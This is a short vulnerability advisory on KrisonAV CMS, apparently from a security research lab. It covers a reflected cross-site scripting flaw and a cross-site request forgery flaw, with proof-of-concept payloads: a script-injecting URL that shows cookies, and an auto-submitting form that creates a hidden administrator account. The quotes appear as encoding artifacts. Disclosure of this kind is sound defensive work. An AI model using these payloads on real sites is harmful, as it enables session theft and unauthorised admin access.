High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.
Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712
The vulnerability exists due to insufficient filtration of user-supplied data passed to βcontentβ HTTP GET parameter via β/services/get_article.phpβ script. A remote attacker can trick a user to follow a specially crafted link and execute arbitrary HTML and script code in userβs browser in context of the vulnerable website.
The exploitation example below uses JavaScript βalert()β function to display userβs cookies:
http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E
Π‘ross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713
The vulnerability exists due to insufficient verification of the HTTP request origin in β/users_maint.htmlβ script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a new account with administrative privileges.
PoC (Proof-of-Concept) below will create a new account with login βusernameβ and password βpasswordβ:
<form action=βhttp://[host]/users_maint.html?itemid=52&maint=1&ccsForm=usersβ method=βpostβ name=βf1β>
<input type=βhiddenβ name=βdisabledCheckBoxβ value=β1β>
<input type=βhiddenβ name=βusernameβ value=βusernameβ>
<input type=βhiddenβ name=βpasswordβ value=βpasswordβ>
<input type=βhiddenβ name=βgroups_indexβ value=β20β>
<input type=βhiddenβ name=βemailβ value="[email protected]">
<input type=βhiddenβ name=βButton_Insertβ value=βSaveβ>
<input type=βsubmitβ id=βbtnβ>
</form>
<script>
document.f1.submit();
</script>